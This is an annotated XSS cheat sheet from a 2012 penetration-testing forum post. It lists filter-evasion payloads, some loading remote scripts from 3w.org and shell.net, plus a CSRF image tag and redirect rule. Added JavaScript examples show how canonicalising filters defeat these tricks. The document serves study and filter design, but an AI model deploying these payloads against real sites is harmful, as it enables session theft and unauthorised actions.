China Network Penetration Testing Alliance

Title: XSS cross-site scripting attack summary

Author: admin    Time: 2012-9-5 14:56
It seems there is not much XSS material on t00ls; I saw some good stuff and copied it over, in case any of you need to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript URL
<IMG SRC="javascript:alert('XSS');">
(The copy repeated the script tag from (1) under this heading; the IMG form above is the vector the heading describes.)

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>
A caveat that applies to every javascript: entry in this list: only older browsers (IE6-era Internet Explorer, Netscape and early Mozilla) ran javascript: URLs in resource-loading attributes such as IMG SRC, BACKGROUND, DYNSRC, LOWSRC and CSS url(); current browsers ignore the URL there. The same encodings still matter for navigation sinks (A HREF, IFRAME SRC, FORM ACTION, META refresh), and the payloads remain useful as probes of what a filter lets through.

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entities (semicolons required)
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
The copy showed the entities already decoded to plain double quotes. &quot; is what gets past a filter on the quote character: the browser decodes the attribute value before it parses the URL, so the filter never sees a literal quote.

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
88, 83, 83 are the character codes of "XSS". The "(calculator)" notes in this list refer to the character-code encoder that accompanied the original cheat sheet; it produces the encoded forms below when quotes or letters are filtered.

(8) UTF-8 Unicode (decimal character reference) encoding (calculator)
<IMG SRC=jav..omitted..S')>
javascript:alert('XSS') written as &#106;&#97;... style decimal references with semicolons.

(9) 7-digit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
Each reference is zero-padded to seven digits (&#0000106 for j), which defeats filters that look only for the short &#NNN; form; browsers decode numeric references without a terminating semicolon as long as the next character is not itself a digit.

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>
(11) Embedded tab, splitting the JavaScript keyword
<IMG SRC="jav	ascript:alert('XSS');">
(A literal tab character between "jav" and "ascript"; the copy had collapsed it to a space.)

(12) Embedded encoded tab, splitting the JavaScript keyword
<IMG SRC="jav&#x09;ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav&#x0A;ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
In (11) to (14) the copy had already decoded the whitespace, leaving four identical lines; the encoded forms above are the vectors the headings describe. They work because the browser removes tab, line feed and carriage return anywhere in a URL before it resolves the scheme.

(15) Multi-line injected JavaScript, an extreme example
<IMG SRC="javascript:alert('XSS')">
In the original vector every character of the tag sits on its own line; the line breaks were collapsed in the copy.

(16) Working around character limits (all fragments must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
Each block fits a short field; concatenated, z is document.write("<script src=http://www.shell.net/1.js></script>") and the final eval runs it. (The copy spelled the call "eval_r", which is not a valid identifier.)

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2 (null characters are basically ineffective domestically, since there is nowhere to exploit them)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
Both null-byte tricks depend on old Internet Explorer skipping the NUL; an HTML5 tokenizer replaces NUL with U+FFFD, so <SCR\0IPT> is not a script tag there.

(19) Spaces and a meta character before the JavaScript in an IMG tag
<IMG SRC="   javascript:alert('XSS');">
The heading's meta character is a control character (&#14; in the original cheat sheet) placed before the spaces; it did not survive the copy. Leading whitespace and C0 control characters are stripped by the URL parser, so a check anchored at the start of the raw value misses the scheme.
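The case, entity, whitespace and NUL tricks in (3) to (14), (17) and (19) all defeat a filter that looks at the raw attribute value; they do not defeat one that first canonicalises the value the way the browser will. The following is an added example written for this page, not code from the original post or the cheat sheet it copies: it applies HTML attribute decoding and then the WHATWG URL whitespace rules, in that order, and compares a literal-prefix filter with a scheme check on the canonical form. The sample values are constructed from the entries above; NUL stripping is an opt-in flag because only old Internet Explorer ignored NUL.

```javascript
// Added example, not from the original post: canonicalise an attribute URL the
// way a browser does before checking its scheme, and compare that with the
// literal string match that entries (3)-(14), (17) and (19) are built to evade.

// Step 1, HTML attribute decoding: numeric character references in decimal or
// hex, with or without the terminating semicolon, with any leading-zero padding.
function decodeNumericEntities(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (match, body) => {
    const isHex = body[0] === "x" || body[0] === "X";
    const cp = parseInt(isHex ? body.slice(1) : body, isHex ? 16 : 10);
    return cp > 0x10ffff ? match : String.fromCodePoint(cp);
  });
}

// Step 2, URL parsing: the WHATWG URL parser removes ASCII tab, LF and CR
// anywhere in the input, strips leading/trailing C0 controls and spaces, and
// lower-cases the scheme. NUL bytes were ignored only by old Internet Explorer
// (entry 17), so that is an opt-in here rather than the default.
function canonicaliseUrl(raw, { legacyNullByte = false } = {}) {
  let s = decodeNumericEntities(raw);
  if (legacyNullByte) s = s.replace(/\0/g, "");
  s = s.replace(/[\t\n\r]/g, "");
  s = s.replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, "");
  s = s.replace(/^[a-z][a-z0-9+.-]*:/i, (scheme) => scheme.toLowerCase());
  return s;
}

// The check a filter should make: the scheme of the canonical form.
function isJavascriptUrl(raw, opts) {
  return /^javascript:/.test(canonicaliseUrl(raw, opts));
}

// The check the cheat sheet is written against: a literal prefix test on raw input.
function naiveFilterCatches(raw) {
  return raw.startsWith("javascript:");
}

// Constructed sample SRC values, one per numbered entry above (not captured data).
const SAMPLES = {
  "(3) no quotes":        "javascript:alert('XSS')",
  "(4) mixed case":       "JaVaScRiPt:alert('XSS')",
  "(8) decimal entities": "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;",
  "(9) padded, no ;":     "&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058alert('XSS')",
  "(10) hex, no ;":       "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29",
  "(11) literal tab":     "jav\tascript:alert('XSS')",
  "(12) encoded tab":     "jav&#x09;ascript:alert('XSS')",
  "(13) encoded LF":      "jav&#x0A;ascript:alert('XSS')",
  "(14) encoded CR":      "jav&#x0D;ascript:alert('XSS')",
  "(17) NUL byte":        "java\0script:alert('XSS')",
  "(19) leading spaces":  "   javascript:alert('XSS')",
};

// Run both checks over every sample; returns the canonical form and both verdicts.
function compareFilters() {
  const out = {};
  for (const [name, raw] of Object.entries(SAMPLES)) {
    out[name] = {
      canonical: canonicaliseUrl(raw, { legacyNullByte: true }),
      naive: naiveFilterCatches(raw),
      canonicalised: isJavascriptUrl(raw, { legacyNullByte: true }),
    };
  }
  return out;
}
```

Every sample canonicalises to the same string, javascript:alert('XSS'), and only entry (3) is caught by the literal prefix test. The order of the two steps is the point: entity decoding belongs to the HTML attribute, whitespace removal to the URL parser, and a filter that applies them in the other order (or only one of them) reopens entries (12) to (14). In current browsers this matters for A HREF, IFRAME SRC and FORM ACTION rather than IMG SRC, but the canonicalisation is the same.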
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
The point of (20) to (22): filters often assume a space separates the tag name or event handler from what follows, so a pattern such as "<script " never matches. In the pre-HTML5 Gecko parser almost any non-alphanumeric character ended the name; in the HTML5 tokenizer only the slash behaves that way (it enters the self-closing-tag state and falls through to attribute parsing), so (20) and (22) still load the script while (21) no longer yields an onload attribute.

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag, 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
The regex literal /XSS/ supplies the string through its .source property, so no quote character is needed.

(29) Escaping JavaScript escapes
\";alert('XSS');//
For input written into a JavaScript string and "protected" by prefixing quotes with a backslash: the attacker's backslash consumes the filter's, \" becomes \\", the string is closed and the remainder runs as code.

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
(TYPE="IMAGE" was lost in the copy; without it the SRC attribute is ignored.)

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY ONLOAD=alert('XSS')>
(The copy had lost the event handler and read <BODY('XSS')>; onload is the attribute this entry uses.)

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
DYNSRC, LOWSRC and BGSOUND are Internet Explorer-only attributes and elements.
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META refresh URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with an extra character in front of the URL (decimal 1-32, 34, 39, 160, 8192-8, 13, 12288, 65279, as listed in the source)
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
(The leading &#1; is one of the listed characters; the copy had decoded it away.)

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (anything that is an open angle bracket followed by a letter is a tag)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE with the expression keyword split by a comment
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
(The copy kept only a garbled tail of this entry; the form above, with a CSS comment inside the keyword, is the vector the original cheat sheet gives.)

(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">
Entries (48) to (52) use CSS expressions, an Internet Explorer feature that was removed in IE8 standards mode; the "expression_r" spelling in the copy is not a valid CSS function and is written here as expression.
(55) EMBED tag: a Flash file can be embedded and carry the XSS inside it
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) ActionScript inside the Flash file can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
The concatenation is getURL("javascript:alert('XSS');"), assembled at runtime so that a scan of the SWF for the getURL or javascript strings finds nothing.

(57) XML namespace; the .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image file and load that
<SCRIPT SRC=""></SCRIPT>
The SRC value (the URL of the image that actually contains JavaScript) was lost in the copy. A script tag executes whatever bytes the URL returns regardless of the file extension; a server that sends X-Content-Type-Options: nosniff makes the browser refuse scripts served with a non-JavaScript MIME type.

(59) IMG embedded command; can trigger arbitrary actions
<IMG SRC="http://www.XXX.com/a.php?a=b">
The browser issues the GET with the victim's cookies, so any state-changing action reachable by GET fires; this is cross-site request forgery through an image tag rather than script execution.

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
An Apache .htaccess rule on the attacker's server: a request for a.jpg is answered with a 302 to the admin action, which the victim's browser follows with its cookies. The "&deleteuser" suffix is as given in the source.
(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
Entries (61) to (66) all put a ">" inside an attribute value, so a filter that treats the first ">" as the end of the tag sees a script tag with no SRC, while the browser keeps reading attributes up to the real ">". The backtick form (65) and the bare "=" form (62) relied on Internet Explorer's old parser; an HTML5 tokenizer only honours a quote that follows "=" after an attribute name. In (67) the tag is assembled by document.write at runtime, so no static scan of the HTML finds it.
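What (61) to (67) exploit is a disagreement between a regex and the HTML tokenizer about where a tag ends. The following added example, written for this page and not taken from the original post, runs a typical "block remote script tags" regex next to a small start-tag scanner that follows the HTML5 quoting rules, over the seven vectors above plus (1) and (22) as controls. The scanner is an assumption of this example rather than a browser's parser: it models attribute quoting only and ignores RAWTEXT content, comments and CDATA.

```javascript
// Added example, not from the original post: a regex that treats the first ">"
// as the end of a tag disagrees with the HTML tokenizer, which treats ">" inside
// a quoted attribute value as data. Entries (61)-(67) live in that gap.

// Filter under test: "block any script tag that loads a remote file".
const NAIVE_REMOTE_SCRIPT = /<script[^>]*\ssrc\s*=/i;
function naiveDetect(html) {
  return NAIVE_REMOTE_SCRIPT.test(html);
}

// Simplified start-tag scanner using the HTML5 rules that matter here: a quote
// begins a quoted value only when it follows "=" after an attribute name; a
// backtick, or a quote in name position, is just another name character; and
// an unquoted ">" ends the tag. (Assumption of this example: RAWTEXT, comments
// and CDATA are not modelled.) Returns the index just past ">", or -1.
function tagEnd(html, start) {
  let nameStarted = false;   // inside a tag or attribute name
  let expectValue = false;   // saw "=" after a name, a value may follow
  for (let i = start + 1; i < html.length; i++) {
    const c = html[i];
    if (expectValue && (c === '"' || c === "'")) {
      const close = html.indexOf(c, i + 1);
      if (close === -1) return -1;           // unterminated value: tag never closes
      i = close;                             // skip the quoted value; ">" inside is data
      expectValue = false;
      continue;
    }
    if (c === ">") return i + 1;
    if (c === "=" && nameStarted) { expectValue = true; nameStarted = false; }
    else if (/\s/.test(c)) nameStarted = false;
    else { nameStarted = true; expectValue = false; }
  }
  return -1;
}

// Walk the tags as the tokenizer would and look for a script start tag with src.
function tokenizerDetect(html) {
  let pos = 0;
  while ((pos = html.indexOf("<", pos)) !== -1) {
    const end = tagEnd(html, pos);
    if (end === -1) break;
    const tag = html.slice(pos, end);
    if (/^<script[\s\/]/i.test(tag) && /[\s\/]src\s*=/i.test(tag)) return true;
    pos = end;
  }
  return false;
}

// Constructed vectors: (1) and (22) as controls, then (61)-(67) from the list above.
const VECTORS = {
  "(1)":  '<SCRIPT SRC="http://3w.org/xss.js"></SCRIPT>',
  "(22)": '<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>',
  "(61)": '<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>',
  "(62)": '<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>',
  "(63)": '<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>',
  "(64)": '<SCRIPT "a=\'>\'" SRC="http://3w.org/xss.js"></SCRIPT>',
  "(65)": '<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>',
  "(66)": '<SCRIPT a=">\'>" SRC="http://3w.org/xss.js"></SCRIPT>',
  "(67)": '<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>',
};

// Both verdicts per vector: naive regex vs tokenizer-based scan.
function compareDetectors() {
  const out = {};
  for (const [name, html] of Object.entries(VECTORS)) {
    out[name] = { naive: naiveDetect(html), tokenizer: tokenizerDetect(html) };
  }
  return out;
}
```

The regex catches only (1). The scanner additionally catches (22), (61), (63), (64) and (66), and correctly leaves (62) and (65) alone, since under HTML5 quoting those tags end at the first ">" and the rest is text. (67) is missed by both, which is the lesson of that entry: a tag built by document.write only exists in the DOM at runtime, so the defence has to be output encoding or a DOM-level check, not a scan of the markup.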
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://%33%77%2E%6F%72%67">XSS</A>
(The copy had decoded this to http://3w.org; the line above is that host percent-encoded, which the browser decodes before resolving it.)

(70) IP as a decimal number
<A HREF="http://3232235521">XSS</A>

(71) IP in hex
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>
(70) to (72) are all 192.168.0.1; the copy's "0×00" used a multiplication sign where the hex prefix is 0x.

(73) Mixed encoding
<A HREF="h
tt	p://6	6.000146.0x7.147/">XSS</A>
A line feed after "h" and tabs inside "http" and the host (literal characters above) are removed by the URL parser; the host mixes decimal, zero-padded octal (000146 is 102) and hex (0x7), and resolves to 66.102.7.147.

(74) Omitting http:
<A HREF="//www.google.com/">XSS</A>

(75) Omitting www
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS name (trailing dot)
<A HREF="http://www.google.com./">XSS</A>

(77) javascript: link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
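The host spellings in (68) to (76) are one address or name written many ways, so a deny or allow list that compares strings is bypassed by any of them. The following added example, written for this page and not taken from the original post, reduces an href to a canonical host following the WHATWG IPv4 number rules (hex, octal, decimal, fewer than four parts) and the tab/newline stripping that (73) relies on. Handling of user:pass@ and :port is included as an extension beyond what the list shows; the test inputs are constructed from the entries above.

```javascript
// Added example, not from the original post: reduce the host spellings in
// entries (68)-(76) to one canonical form, so an allow/deny list compares
// addresses rather than strings. IPv4 parsing follows the WHATWG URL rules;
// the user:pass@ and :port handling is an extension beyond what the list shows.

// One dotted component: "0x" prefix is hex, a leading zero is octal, else decimal.
// Returns null when the component is not numeric in its radix (i.e. a DNS label).
function parseIpv4Part(part) {
  let radix = 10, digits = part;
  if (/^0x/i.test(digits)) { radix = 16; digits = digits.slice(2); }
  else if (digits.length > 1 && digits[0] === "0") { radix = 8; digits = digits.slice(1); }
  if (digits === "") return 0;                         // "0x" alone is zero
  const valid = { 8: /^[0-7]+$/, 10: /^[0-9]+$/, 16: /^[0-9a-f]+$/i }[radix];
  return valid.test(digits) ? parseInt(digits, radix) : null;
}

// Host string to dotted quad, or null if it is not an IPv4 literal.
function ipv4ToDotted(host) {
  const parts = host.split(".");
  if (parts.length > 4) return null;
  const nums = parts.map(parseIpv4Part);
  if (nums.some((n) => n === null)) return null;
  // Leading parts are single octets; the last part fills the remaining bytes,
  // which is why a bare 32-bit number (entry 70) is a valid address.
  for (let i = 0; i < nums.length - 1; i++) if (nums[i] > 255) return null;
  const last = nums[nums.length - 1];
  if (last >= 256 ** (5 - nums.length)) return null;
  let value = last;
  for (let i = 0; i < nums.length - 1; i++) value += nums[i] * 256 ** (3 - i);
  return [24, 16, 8, 0].map((sh) => Math.floor(value / 2 ** sh) % 256).join(".");
}

// Lower-case, drop the trailing dot (entry 76), percent-decode (entry 69), then
// collapse any IPv4 spelling; DNS names come back unchanged otherwise.
function canonicaliseHost(host) {
  let h = host.toLowerCase().replace(/\.$/, "");
  try { h = decodeURIComponent(h); } catch (e) { return null; }
  const ip = ipv4ToDotted(h);
  return ip === null ? h : ip;
}

// Extract the host as the browser will see it: tab, LF and CR are removed
// anywhere (entry 73), the scheme may be omitted (entry 74), and anything
// before "@" is userinfo rather than the host.
function hostFromHref(href) {
  const clean = href.replace(/[\t\n\r]/g, "");
  const m = /^(?:[a-z][a-z0-9+.-]*:)?\/\/([^\/?#]*)/i.exec(clean);
  if (!m) return null;                                   // not a network URL; (77) is javascript:
  let authority = m[1];
  if (authority.includes("@")) authority = authority.slice(authority.lastIndexOf("@") + 1);
  authority = authority.replace(/:\d*$/, "");            // drop an explicit port
  return canonicaliseHost(authority);
}

// Deny list keyed on the canonical host: decimal, hex, octal, mixed and
// trailing-dot spellings of a listed address all match.
function isDenied(href, denyList) {
  const host = hostFromHref(href);
  return host !== null && denyList.has(host);
}
```

With a deny list containing 192.168.0.1, entries (70), (71) and (72) are all rejected, and the mixed form in (73) comes out as 66.102.7.147. Entries (74) to (76) canonicalise to the bare DNS name; (75) is a genuinely different host from www.google.com, which is why a list keyed on the www name alone misses it. Entry (77) returns null because it is not a network URL at all; a filter that only handles http(s) hosts has to treat that as a separate, rejected case rather than pass it through.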




Welcome to China Network Penetration Testing Alliance (https://www.cobjon.com/) Powered by Discuz! X3.2